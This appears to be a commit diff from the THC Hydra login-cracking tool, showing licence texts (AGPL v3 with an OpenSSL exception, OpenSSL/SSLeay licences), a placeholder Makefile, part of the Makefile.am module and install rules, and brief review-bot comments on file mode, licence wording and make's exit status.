A "Standard Interface" means an interface that either is an official
standard defined by a recognized standards body, or, in the case of
interfaces specified for a particular programming language, one that
is widely used among developers working in that language.
The "System Libraries" of an executable work include anything, other
than the work as a whole, that (a) is included in the normal form of
packaging a Major Component, but which is not part of that Major
Component, and (b) serves only to enable use of the work with that
Major Component, or to implement a Standard Interface for which an
implementation is available to the public in source code form. A
"Major Component", in this context, means a major essential component
(kernel, window system, and so on) of the specific operating system
(if any) on which the executable work runs, or a compiler used to
produce the work, or an object code interpreter used to run it.
The "Corresponding Source" for a work in object code form means all
the source code needed to generate, install, and (for an executable
work) run the object code and to modify the work, including scripts to
control those activities. However, it does not include the work's
System Libraries, or general-purpose tools or generally available free
programs which are used unmodified in performing those activities but
which are not part of the work. For example, Corresponding Source
includes interface definition files associated with source files for
the work, and the source code for shared libraries and dynamically
linked subprograms that the work is specifically designed to require,
such as by intimate data communication or control flow between those
subprograms and other parts of the work.
The Corresponding Source need not include anything that users
can regenerate automatically from other parts of the Corresponding
Source.
The Corresponding Source for a work in source code form is that
same work.
2. Basic Permissions.
All rights granted under this License are granted for the term of
copyright on the Program, and are irrevocable provided the stated
conditions are met. This License explicitly affirms your unlimited
permission to run the unmodified Program. The output from running a
covered work is covered by this License only if the output, given its
content, constitutes a covered work. This License acknowledges your
rights of fair use or other equivalent, as provided by copyright law.
You may make, run and propagate covered works that you do not
convey, without conditions so long as your license otherwise remains
in force. You may convey covered works to others for the sole purpose
of having them make modifications exclusively for you, or provide you
with facilities for running those works, provided that you comply with
the terms of this License in conveying all material for which you do
not control copyright. Those thus making or running the covered works
for you must do so exclusively on your behalf, under your direction
and control, on terms that prohibit them from making any copies of
your copyrighted material outside their relationship with you.
Conveying under any other circumstances is permitted solely under
the conditions stated below. Sublicensing is not allowed; section 10
makes it unnecessary.
3. Protecting Users' Legal Rights From Anti-Circumvention Law.
No covered work shall be deemed part of an effective technological
measure under any applicable law fulfilling obligations under article
11 of the WIPO copyright treaty adopted on 20 December 1996, or
similar laws prohibiting or restricting circumvention of such
measures.
When you convey a covered work, you waive any legal power to forbid
circumvention of technological measures to the extent such circumvention
is effected by exercising rights under this License with respect to
the covered work, and you disclaim any intention to limit operation or
modification of the work as a means of enforcing, against the work's
users, your or third parties' legal rights to forbid circumvention of
technological measures.
4. Conveying Verbatim Copies.
You may convey verbatim copies of the Program's source code as you
receive it, in any medium, provided that you conspicuously and
appropriately publish on each copy an appropriate copyright notice;
keep intact all notices stating that this License and any
non-permissive terms added in accord with section 7 apply to the code;
keep intact all notices of the absence of any warranty; and give all
recipients a copy of this License along with the Program.
You may charge any price or no price for each copy that you convey,
and you may offer support or warranty protection for a fee.
5. Conveying Modified Source Versions.
You may convey a work based on the Program, or the modifications to
produce it from the Program, in the form of source code under the
terms of section 4, provided that you also meet all of these conditions:
a) The work must carry prominent notices stating that you modified
it, and giving a relevant date.
b) The work must carry prominent notices stating that it is
released under this License and any conditions added under section
7. This requirement modifies the requirement in section 4 to
"keep intact all notices".
c) You must license the entire work, as a whole, under this
License to anyone who comes into possession of a copy. This
License will therefore apply, along with any applicable section 7
additional terms, to the whole of the work, and all its parts,
regardless of how they are packaged. This License gives no
permission to license the work in any other way, but it does not
invalidate such permission if you have separately received it.
d) If the work has interactive user interfaces, each must display
Appropriate Legal Notices; however, if the Program has interactive
interfaces that do not display Appropriate Legal Notices, your
work need not make them do so.
A compilation of a covered work with other separate and independent
works, which are not by their nature extensions of the covered work,
and which are not combined with it such as to form a larger program,
in or on a volume of a storage or distribution medium, is called an
"aggregate" if the compilation and its resulting copyright are not
used to limit the access or legal rights of the compilation's users
beyond what the individual works permit. Inclusion of a covered work
in an aggregate does not cause this License to apply to the other
parts of the aggregate.
6. Conveying Non-Source Forms.
You may convey a covered work in object code form under the terms
of sections 4 and 5, provided that you also convey the
machine-readable Corresponding Source under the terms of this License,
in one of these ways:
a) Convey the object code in, or embodied in, a physical product
(including a physical distribution medium), accompanied by the
Corresponding Source fixed on a durable physical medium
customarily used for software interchange.
b) Convey the object code in, or embodied in, a physical product
(including a physical distribution medium), accompanied by a
written offer, valid for at least three years and valid for as
long as you offer spare parts or customer support for that product
model, to give anyone who possesses the object code either (1) a
copy of the Corresponding Source for all the software in the
product that is covered by this License, on a durable physical
medium customarily used for software interchange, for a price no
more than your reasonable cost of physically performing this
conveying of source, or (2) access to copy the
Corresponding Source from a network server at no charge.
c) Convey individual copies of the object code with a copy of the
written offer to provide the Corresponding Source. This
alternative is allowed only occasionally and noncommercially, and
only if you received the object code with such an offer, in accord
with subsection 6b.
d) Convey the object code by offering access from a designated
place (gratis or for a charge), and offer equivalent access to the
Corresponding Source in the same way through the same place at no
further charge. You need not require recipients to copy the
Corresponding Source along with the object code. If the place to
copy the object code is a network server, the Corresponding Source
may be on a different server (operated by you or a third party)
that supports equivalent copying facilities, provided you maintain
clear directions next to the object code saying where to find the
Corresponding Source. Regardless of what server hosts the
Corresponding Source, you remain obligated to ensure that it is
available for as long as needed to satisfy these requirements.
e) Convey the object code using peer-to-peer transmission, provided
you inform other peers where the object code and Corresponding
Source of the work are being offered to the general public at no
charge under subsection 6d.
A separable portion of the object code, whose source code is excluded
from the Corresponding Source as a System Library, need not be
included in conveying the object code work.
A "User Product" is either (1) a "consumer product", which means any
tangible personal property which is normally used for personal, family,
or household purposes, or (2) anything designed or sold for incorporation
into a dwelling. In determining whether a product is a consumer product,
doubtful cases shall be resolved in favor of coverage. For a particular
product received by a particular user, "normally used" refers to a
typical or common use of that class of product, regardless of the status
of the particular user or of the way in which the particular user
actually uses, or expects or is expected to use, the product. A product
is a consumer product regardless of whether the product has substantial
commercial, industrial or non-consumer uses, unless such uses represent
the only significant mode of use of the product.
"Installation Information" for a User Product means any methods,
procedures, authorization keys, or other information required to install
and execute modified versions of a covered work in that User Product from
a modified version of its Corresponding Source. The information must
suffice to ensure that the continued functioning of the modified object
code is in no case prevented or interfered with solely because
modification has been made.
If you convey an object code work under this section in, or with, or
specifically for use in, a User Product, and the conveying occurs as
part of a transaction in which the right of possession and use of the
User Product is transferred to the recipient in perpetuity or for a
fixed term (regardless of how the transaction is characterized), the
Corresponding Source conveyed under this section must be accompanied
by the Installation Information. But this requirement does not apply
if neither you nor any third party retains the ability to install
modified object code on the User Product (for example, the work has
been installed in ROM).
The requirement to provide Installation Information does not include a
requirement to continue to provide support service, warranty, or updates
for a work that has been modified or installed by the recipient, or for
the User Product in which it has been modified or installed. Access to a
network may be denied when the modification itself materially and
adversely affects the operation of the network or violates the rules and
protocols for communication across the network.
Corresponding Source conveyed, and Installation Information provided,
in accord with this section must be in a format that is publicly
documented (and with an implementation available to the public in
source code form), and must require no special password or key for
unpacking, reading or copying.
7. Additional Terms.
"Additional permissions" are terms that supplement the terms of this
License by making exceptions from one or more of its conditions.
Additional permissions that are applicable to the entire Program shall
be treated as though they were included in this License, to the extent
that they are valid under applicable law. If additional permissions
apply only to part of the Program, that part may be used separately
under those permissions, but the entire Program remains governed by
this License without regard to the additional permissions.
When you convey a copy of a covered work, you may at your option
remove any additional permissions from that copy, or from any part of
it. (Additional permissions may be written to require their own
removal in certain cases when you modify the work.) You may place
additional permissions on material, added by you to a covered work,
for which you have or can give appropriate copyright permission.
Notwithstanding any other provision of this License, for material you
add to a covered work, you may (if authorized by the copyright holders of
that material) supplement the terms of this License with terms:
a) Disclaiming warranty or limiting liability differently from the
terms of sections 15 and 16 of this License; or
b) Requiring preservation of specified reasonable legal notices or
author attributions in that material or in the Appropriate Legal
Notices displayed by works containing it; or
c) Prohibiting misrepresentation of the origin of that material, or
requiring that modified versions of such material be marked in
reasonable ways as different from the original version; or
d) Limiting the use for publicity purposes of names of licensors or
authors of the material; or
e) Declining to grant rights under trademark law for use of some
trade names, trademarks, or service marks; or
f) Requiring indemnification of licensors and authors of that
material by anyone who conveys the material (or modified versions of
it) with contractual assumptions of liability to the recipient, for
any liability that these contractual assumptions directly impose on
those licensors and authors.
All other non-permissive additional terms are considered "further
restrictions" within the meaning of section 10. If the Program as you
received it, or any part of it, contains a notice stating that it is
governed by this License along with a term that is a further
restriction, you may remove that term. If a license document contains
a further restriction but permits relicensing or conveying under this
License, you may add to a covered work material governed by the terms
of that license document, provided that the further restriction does
not survive such relicensing or conveying.
If you add terms to a covered work in accord with this section, you
must place, in the relevant source files, a statement of the
additional terms that apply to those files, or a notice indicating
where to find the applicable terms.
Additional terms, permissive or non-permissive, may be stated in the
form of a separately written license, or stated as exceptions;
the above requirements apply either way.
8. Termination.
You may not propagate or modify a covered work except as expressly
provided under this License. Any attempt otherwise to propagate or
modify it is void, and will automatically terminate your rights under
this License (including any patent licenses granted under the third
paragraph of section 11).
However, if you cease all violation of this License, then your
license from a particular copyright holder is reinstated (a)
provisionally, unless and until the copyright holder explicitly and
finally terminates your license, and (b) permanently, if the copyright
holder fails to notify you of the violation by some reasonable means
prior to 60 days after the cessation.
Moreover, your license from a particular copyright holder is
reinstated permanently if the copyright holder notifies you of the
violation by some reasonable means, this is the first time you have
received notice of violation of this License (for any work) from that
copyright holder, and you cure the violation prior to 30 days after
your receipt of the notice.
Termination of your rights under this section does not terminate the
licenses of parties who have received copies or rights from you under
this License. If your rights have been terminated and not permanently
reinstated, you do not qualify to receive new licenses for the same
material under section 10.
9. Acceptance Not Required for Having Copies.
You are not required to accept this License in order to receive or
run a copy of the Program. Ancillary propagation of a covered work
occurring solely as a consequence of using peer-to-peer transmission
to receive a copy likewise does not require acceptance. However,
nothing other than this License grants you permission to propagate or
modify any covered work. These actions infringe copyright if you do
not accept this License. Therefore, by modifying or propagating a
covered work, you indicate your acceptance of this License to do so.
10. Automatic Licensing of Downstream Recipients.
Each time you convey a covered work, the recipient automatically
receives a license from the original licensors, to run, modify and
propagate that work, subject to this License. You are not responsible
for enforcing compliance by third parties with this License.
An "entity transaction" is a transaction transferring control of an
organization, or substantially all assets of one, or subdividing an
organization, or merging organizations. If propagation of a covered
work results from an entity transaction, each party to that
transaction who receives a copy of the work also receives whatever
licenses to the work the party's predecessor in interest had or could
give under the previous paragraph, plus a right to possession of the
Corresponding Source of the work from the predecessor in interest, if
the predecessor has it or can get it with reasonable efforts.
You may not impose any further restrictions on the exercise of the
rights granted or affirmed under this License. For example, you may
not impose a license fee, royalty, or other charge for exercise of
rights granted under this License, and you may not initiate litigation
(including a cross-claim or counterclaim in a lawsuit) alleging that
any patent claim is infringed by making, using, selling, offering for
sale, or importing the Program or any portion of it.
11. Patents.
A "contributor" is a copyright holder who authorizes use under this
License of the Program or a work on which the Program is based. The
work thus licensed is called the contributor's "contributor version".
A contributor's "essential patent claims" are all patent claims
owned or controlled by the contributor, whether already acquired or
hereafter acquired, that would be infringed by some manner, permitted
by this License, of making, using, or selling its contributor version,
but do not include claims that would be infringed only as a
consequence of further modification of the contributor version. For
purposes of this definition, "control" includes the right to grant
patent sublicenses in a manner consistent with the requirements of
this License.
Each contributor grants you a non-exclusive, worldwide, royalty-free
patent license under the contributor's essential patent claims, to
make, use, sell, offer for sale, import and otherwise run, modify and
propagate the contents of its contributor version.
In the following three paragraphs, a "patent license" is any express
agreement or commitment, however denominated, not to enforce a patent
(such as an express permission to practice a patent or covenant not to
sue for patent infringement). To "grant" such a patent license to a
party means to make such an agreement or commitment not to enforce a
patent against the party.
If you convey a covered work, knowingly relying on a patent license,
and the Corresponding Source of the work is not available for anyone
to copy, free of charge and under the terms of this License, through a
publicly available network server or other readily accessible means,
then you must either (1) cause the Corresponding Source to be so
available, or (2) arrange to deprive yourself of the benefit of the
patent license for this particular work, or (3) arrange, in a manner
consistent with the requirements of this License, to extend the patent
license to downstream recipients. "Knowingly relying" means you have
actual knowledge that, but for the patent license, your conveying the
covered work in a country, or your recipient's use of the covered work
in a country, would infringe one or more identifiable patents in that
country that you have reason to believe are valid.
If, pursuant to or in connection with a single transaction or
arrangement, you convey, or propagate by procuring conveyance of, a
covered work, and grant a patent license to some of the parties
receiving the covered work authorizing them to use, propagate, modify
or convey a specific copy of the covered work, then the patent license
you grant is automatically extended to all recipients of the covered
work and works based on it.
A patent license is "discriminatory" if it does not include within
the scope of its coverage, prohibits the exercise of, or is
conditioned on the non-exercise of one or more of the rights that are
specifically granted under this License. You may not convey a covered
work if you are a party to an arrangement with a third party that is
in the business of distributing software, under which you make payment
to the third party based on the extent of your activity of conveying
the work, and under which the third party grants, to any of the
parties who would receive the covered work from you, a discriminatory
patent license (a) in connection with copies of the covered work
conveyed by you (or copies made from those copies), or (b) primarily
for and in connection with specific products or compilations that
contain the covered work, unless you entered into that arrangement,
or that patent license was granted, prior to 28 March 2007.
Nothing in this License shall be construed as excluding or limiting
any implied license or other defenses to infringement that may
otherwise be available to you under applicable patent law.
12. No Surrender of Others' Freedom.
If conditions are imposed on you (whether by court order, agreement or
otherwise) that contradict the conditions of this License, they do not
excuse you from the conditions of this License. If you cannot convey a
covered work so as to satisfy simultaneously your obligations under this
License and any other pertinent obligations, then as a consequence you may
not convey it at all. For example, if you agree to terms that obligate you
to collect a royalty for further conveying from those to whom you convey
the Program, the only way you could satisfy both those terms and this
License would be to refrain entirely from conveying the Program.
13. Remote Network Interaction; Use with the GNU General Public License.
Notwithstanding any other provision of this License, if you modify the
Program, your modified version must prominently offer all users
interacting with it remotely through a computer network (if your version
supports such interaction) an opportunity to receive the Corresponding
Source of your version by providing access to the Corresponding Source
from a network server at no charge, through some standard or customary
means of facilitating copying of software. This Corresponding Source
shall include the Corresponding Source for any work covered by version 3
of the GNU General Public License that is incorporated pursuant to the
following paragraph.
Notwithstanding any other provision of this License, you have
permission to link or combine any covered work with a work licensed
under version 3 of the GNU General Public License into a single
combined work, and to convey the resulting work. The terms of this
License will continue to apply to the part which is the covered work,
but the work with which it is combined will remain governed by version
3 of the GNU General Public License.
14. Revised Versions of this License.
The Free Software Foundation may publish revised and/or new versions of
the GNU Affero General Public License from time to time. Such new versions
will be similar in spirit to the present version, but may differ in detail to
address new problems or concerns.
Each version is given a distinguishing version number. If the
Program specifies that a certain numbered version of the GNU Affero General
Public License "or any later version" applies to it, you have the
option of following the terms and conditions either of that numbered
version or of any later version published by the Free Software
Foundation. If the Program does not specify a version number of the
GNU Affero General Public License, you may choose any version ever published
by the Free Software Foundation.
If the Program specifies that a proxy can decide which future
versions of the GNU Affero General Public License can be used, that proxy's
public statement of acceptance of a version permanently authorizes you
to choose that version for the Program.
Later license versions may give you additional or different
permissions. However, no additional obligations are imposed on any
author or copyright holder as a result of your choosing to follow a
later version.
15. Disclaimer of Warranty.
THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
16. Limitation of Liability.
IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
SUCH DAMAGES.
17. Interpretation of Sections 15 and 16.
If the disclaimer of warranty and limitation of liability provided
above cannot be given local legal effect according to their terms,
reviewing courts shall apply local law that most closely approximates
an absolute waiver of all civil liability in connection with the
Program, unless a warranty or assumption of liability accompanies a
copy of the Program in return for a fee.
END OF TERMS AND CONDITIONS
How to Apply These Terms to Your New Programs
If you develop a new program, and you want it to be of the greatest
possible use to the public, the best way to achieve this is to make it
free software which everyone can redistribute and change under these terms.
To do so, attach the following notices to the program. It is safest
to attach them to the start of each source file to most effectively
state the exclusion of warranty; and each file should have at least
the "copyright" line and a pointer to where the full notice is found.
<one line to give the program's name and a brief idea of what it does.>
Copyright (C) <year> <name of author>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
Also add information on how to contact you by electronic and paper mail.
If your software can interact with users remotely through a computer
network, you should also make sure that it provides a way for users to
get its source. For example, if your program is a web application, its
interface could display a "Source" link that leads users to an archive
of the code. There are many ways you could offer source, and different
solutions will be better for different programs; see section 13 for the
specific requirements.
You should also get your employer (if you work as a programmer) or school,
if any, to sign a "copyright disclaimer" for the program, if necessary.
For more information on this, and how to apply and follow the GNU AGPL, see
<http://www.gnu.org/licenses/>.
Special Exception
* In addition, as a special exception, the copyright holders give
* permission to link the code of portions of this program with the
* OpenSSL library under certain conditions as described in each
* individual source file, and distribute linked combinations
* including the two.
* You must obey the GNU Affero General Public License in all respects
* for all of the code used other than OpenSSL. If you modify
* file(s) with this exception, you may extend this exception to your
* version of the file(s), but you are not obligated to do so. If you
* do not wish to do so, delete this exception statement from your
* version. If you delete this exception statement from all source
* files in the program, then also delete it here.

170
LICENSE.OPENSSL Executable file

@ -0,0 +1,170 @@
/*
* (c) 2002, 2003, 2004 by Jason McLaughlin and Riadh Elloumi
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License as
* published by the Free Software Foundation; either version 2 of the
* License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful, but
* is provided AS IS, WITHOUT ANY WARRANTY; without even the implied
* warranty of MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, and
* NON-INFRINGEMENT. See the GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place - Suite 330, Boston,
* MA 02111-1307, USA.
*
* In addition, as a special exception, the copyright holders give
* permission to link the code of portions of this program with the
* OpenSSL library under certain conditions as described in each
* individual source file, and distribute linked combinations
* including the two.
* You must obey the GNU General Public License in all respects
* for all of the code used other than OpenSSL. If you modify
* file(s) with this exception, you may extend this exception to your
* version of the file(s), but you are not obligated to do so. If you
* do not wish to do so, delete this exception statement from your
* version. If you delete this exception statement from all source
* files in the program, then also delete it here.
*/
Certain source files in this program permit linking with the OpenSSL
library (http://www.openssl.org), which otherwise wouldn't be allowed
under the GPL. For purposes of identifying OpenSSL, most source files
giving this permission limit it to versions of OpenSSL having a license
identical to that listed in this file (LICENSE.OpenSSL). It is not
necessary for the copyright years to match between this file and the
OpenSSL version in question. However, note that because this file is
an extension of the license statements of these source files, this file
may not be changed except with permission from all copyright holders
of source files in this program which reference this file.
LICENSE ISSUES
==============
The OpenSSL toolkit stays under a dual license, i.e. both the conditions of
the OpenSSL License and the original SSLeay license apply to the toolkit.
See below for the actual license texts. Actually both licenses are BSD-style
Open Source licenses. In case of any license issues related to OpenSSL
please contact openssl-core@openssl.org.
OpenSSL License
---------------
/* ====================================================================
* Copyright (c) 1998-2001 The OpenSSL Project. All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
*
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
*
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* 3. All advertising materials mentioning features or use of this
* software must display the following acknowledgment:
* "This product includes software developed by the OpenSSL Project
* for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
*
* 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
* endorse or promote products derived from this software without
* prior written permission. For written permission, please contact
* openssl-core@openssl.org.
*
* 5. Products derived from this software may not be called "OpenSSL"
* nor may "OpenSSL" appear in their names without prior written
* permission of the OpenSSL Project.
*
* 6. Redistributions of any form whatsoever must retain the following
* acknowledgment:
* "This product includes software developed by the OpenSSL Project
* for use in the OpenSSL Toolkit (http://www.openssl.org/)"
*
* THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
* EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
* PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE OpenSSL PROJECT OR
* ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
* SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
* NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
* STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
* ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
* OF THE POSSIBILITY OF SUCH DAMAGE.
* ====================================================================
*
* This product includes cryptographic software written by Eric Young
* (eay@cryptsoft.com). This product includes software written by Tim
* Hudson (tjh@cryptsoft.com).
*
*/
Original SSLeay License
-----------------------
/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
* All rights reserved.
*
* This package is an SSL implementation written
* by Eric Young (eay@cryptsoft.com).
* The implementation was written so as to conform with Netscapes SSL.
*
* This library is free for commercial and non-commercial use as long as
* the following conditions are aheared to. The following conditions
* apply to all code found in this distribution, be it the RC4, RSA,
* lhash, DES, etc., code; not just the SSL code. The SSL documentation
* included with this distribution is covered by the same copyright terms
* except that the holder is Tim Hudson (tjh@cryptsoft.com).
*
* Copyright remains Eric Young's, and as such any Copyright notices in
* the code are not to be removed.
* If this package is used in a product, Eric Young should be given attribution
* as the author of the parts of the library used.
* This can be in the form of a textual message at program startup or
* in documentation (online or textual) provided with the package.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. All advertising materials mentioning features or use of this software
* must display the following acknowledgement:
* "This product includes cryptographic software written by
* Eric Young (eay@cryptsoft.com)"
* The word 'cryptographic' can be left out if the rouines from the library
* being used are not cryptographic related :-).
* 4. If you include any Windows specific code (or a derivative thereof) from
* the apps directory (application code) you must include an acknowledgement:
* "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
*
* THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
* The licence and distribution terms for any publically available version or
* derivative of this code cannot be changed. i.e. this code cannot simply be
* copied and put under another distribution licence
* [including the GNU Public Licence.]
*/
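Review bot: LICENSE.OPENSSL is added with the executable bit set ("Executable file" in the file header), which a plain-text license does not need; commit it with normal mode like the other documentation files. The header comment in this file also grants the OpenSSL linking exception relative to the GNU General Public License, version 2 or later, while the "Special Exception" at the end of LICENSE is worded against the GNU Affero General Public License. A sentence stating which wording governs hydra's own source files would remove the ambiguity.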

5
Makefile Normal file

@ -0,0 +1,5 @@
all:
@echo Error: you must run "./configure" first
clean:
cp -f Makefile.orig Makefile
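Review bot: the `all` target in this placeholder Makefile only echoes `Error: you must run "./configure" first` and then succeeds, so `make` exits 0 in an unconfigured tree and a build script that checks only the exit status will treat it as built. End the recipe with a failing command (for example `@exit 1` on the line after the echo) so the error shows up in the exit status. Makefile.orig is identical and needs the same change, since `clean` copies it back over Makefile.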

73
Makefile.am Normal file

@ -0,0 +1,73 @@
#
# Makefile for Hydra - (c) 2001-2014 by van Hauser / THC <vh@thc.org>
#
OPTS=-I. -O3
# -Wall -g -pedantic
LIBS=-lm
DIR=/bin
SRC = hydra-vnc.c hydra-pcnfs.c hydra-rexec.c hydra-nntp.c hydra-socks5.c \
hydra-telnet.c hydra-cisco.c hydra-http.c hydra-ftp.c hydra-imap.c \
hydra-pop3.c hydra-smb.c hydra-icq.c hydra-cisco-enable.c hydra-ldap.c \
hydra-mysql.c hydra-mssql.c hydra-xmpp.c hydra-http-proxy-urlenum.c \
hydra-snmp.c hydra-cvs.c hydra-smtp.c hydra-smtp-enum.c hydra-sapr3.c hydra-ssh.c \
hydra-sshkey.c hydra-teamspeak.c hydra-postgres.c hydra-rsh.c hydra-rlogin.c \
hydra-oracle-listener.c hydra-svn.c hydra-pcanywhere.c hydra-sip.c \
hydra-oracle.c hydra-vmauthd.c hydra-asterisk.c hydra-firebird.c hydra-afp.c hydra-ncp.c \
hydra-oracle-sid.c hydra-http-proxy.c hydra-http-form.c hydra-irc.c \
hydra-rdp.c hydra-s7-300.c hydra-redis.c \
crc32.c d3des.c bfg.c ntlm.c sasl.c hmacmd5.c hydra-mod.c
OBJ = hydra-vnc.o hydra-pcnfs.o hydra-rexec.o hydra-nntp.o hydra-socks5.o \
hydra-telnet.o hydra-cisco.o hydra-http.o hydra-ftp.o hydra-imap.o \
hydra-pop3.o hydra-smb.o hydra-icq.o hydra-cisco-enable.o hydra-ldap.o \
hydra-mysql.o hydra-mssql.o hydra-xmpp.o hydra-http-proxy-urlenum.o \
hydra-snmp.o hydra-cvs.o hydra-smtp.o hydra-smtp-enum.o hydra-sapr3.o hydra-ssh.o \
hydra-sshkey.o hydra-teamspeak.o hydra-postgres.o hydra-rsh.o hydra-rlogin.o \
hydra-oracle-listener.o hydra-svn.o hydra-pcanywhere.o hydra-sip.o \
hydra-oracle-sid.o hydra-oracle.o hydra-vmauthd.o hydra-asterisk.o hydra-firebird.o hydra-afp.o hydra-ncp.o \
hydra-http-proxy.o hydra-http-form.o hydra-irc.o hydra-redis.o \
hydra-rdp.o hydra-s7-300.c \
crc32.o d3des.o bfg.o ntlm.o sasl.o hmacmd5.o hydra-mod.o
BINS = hydra pw-inspector
EXTRA_DIST = README README.arm README.palm CHANGES TODO INSTALL LICENSE \
hydra-mod.h hydra.h crc32.h d3des.h
all: pw-inspector hydra $(XHYDRA_SUPPORT)
@echo
@echo Now type "make install"
hydra: hydra.c $(OBJ)
$(CC) $(OPTS) $(SEC) $(LIBS) $(CFLAGS) $(CPPFLAGS) $(LDFLAGS) -o hydra $(HYDRA_LOGO) hydra.c $(OBJ) $(LIBS) $(XLIBS) $(XLIBPATHS) $(XIPATHS) $(XDEFINES)
@echo
@echo If men could get pregnant, abortion would be a sacrament
@echo
xhydra:
-cd hydra-gtk && sh ./make_xhydra.sh
pw-inspector: pw-inspector.c
-$(CC) $(OPTS) $(SEC) $(CFLAGS) $(CPPFLAGS) $(LDFLAGS) -o pw-inspector $(PWI_LOGO) pw-inspector.c
.c.o:
$(CC) $(OPTS) $(SEC) $(CFLAGS) $(CPPFLAGS) -c $< $(XDEFINES) $(XIPATHS)
strip: all
strip $(BINS)
-echo OK > /dev/null && test -x xhydra && strip xhydra || echo OK > /dev/null
install: strip
-mkdir -p $(PREFIX)$(DIR)
cp -f hydra-wizard.sh $(BINS) $(PREFIX)$(DIR) && cd $(PREFIX)$(DIR) && chmod 755 hydra-wizard.sh $(BINS)
-echo OK > /dev/null && test -x xhydra && cp xhydra $(PREFIX)$(DIR) && cd $(PREFIX)$(DIR) && chmod 755 xhydra || echo OK > /dev/null
-sed -e "s|^INSTALLDIR=.*|INSTALLDIR="$(PREFIX)"|" dpl4hydra.sh > $(PREFIX)/bin/dpl4hydra.sh
-chmod 755 $(PREFIX)/bin/dpl4hydra.sh
-mkdir -p $(PREFIX)/etc/
-cp -f *.csv $(PREFIX)/etc/
-mkdir -p $(PREFIX)/man/man1
-cp -f hydra.1 xhydra.1 pw-inspector.1 $(PREFIX)/man/man1
clean:
